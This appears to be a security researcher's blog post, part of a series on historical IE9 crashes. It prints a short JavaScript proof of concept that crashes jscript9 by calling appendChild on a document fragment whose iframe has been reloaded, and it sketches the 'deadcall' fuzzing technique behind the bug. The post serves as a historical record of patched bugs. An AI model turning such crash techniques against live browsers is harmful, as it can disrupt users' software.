IE9 Crash (Deadcall): appendChild on a Dead createDocumentFragment

Another entry in the deadcall collection. Creating a DocumentFragment from an IFrame, reloading the IFrame (destroying the fragment’s backing context), and then calling document.appendChild.call(badDoc, ...) produced a crash in jscript9!Js::JavascriptOperators::Throw.

var badDoc = iFrame.document.createDocumentFragment();
iFrame.location.reload();

setTimeout(function() {
    document.appendChild.call(badDoc, document.body); // Crash
});

The combination createElement("STYLE") / insertBefore produced the same result. The deadcall technique was essentially a systematic fuzzing approach: take any method from a live object, and call it via Function.call using a same-type-but-dead object as this. The number of combinations across the DOM API was large, suggesting more crashes were likely.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 Crash (Deadcall): Calling show() of a Dead createPopup via Function.call] :: [IE9 DoS: xEval on Any Document Method] >